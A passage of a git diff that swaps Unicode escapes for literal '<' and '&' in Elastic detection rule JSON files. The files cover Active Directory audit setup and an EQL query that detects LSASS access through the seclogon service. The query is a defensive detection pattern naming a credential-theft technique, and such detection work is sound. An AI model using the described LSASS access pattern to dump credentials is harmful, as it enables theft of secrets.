(Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json index 5a5f6e41980..b82502d55db 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_105.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json index a30c9835ca5..a1c41e1ba6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_106.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json index c490fa74302..c624c7343ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_107.json @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", - "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", + "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json index 7b38836f346..bffecb53805 100644 --- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_1.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json index 44f7d47b574..573239ba8b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_2.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json index de013db5a55..bf2373f77be 100644 --- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json index ffd4fd349db..82d54ced4b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_4.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json index 7b94e066641..7facb8c55aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json +++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json index b8f0d9bd4de..a269a4ad02a 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json index 8f9880bb7c1..7c680fddcec 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json index b9545fe1d3a..7c698b8920d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json +++ b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json index f8ea1e7a9e0..a86ab03b553 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json index 721741ae98e..372ccda8a36 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json index c85fe29baea..2e1471e39ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_106.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json index fb9c6441fbf..f84fb31f065 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_107.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json index 6d9c5fa1027..73a88bbf1cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_108.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json index 06840a5afca..86ccb457211 100644 --- a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_109.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json index 774ac9afd49..77120195d95 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_103.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json index 6b517a6a904..c782e0a2d78 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_104.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json index be7b07b5b71..527a7727eeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_105.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Suspicious LSASS Access via MalSecLogon", "note": "", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS \u0026 PROCESS_DUP_HANDLE \u0026 PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", "references": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" ], @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_206.json 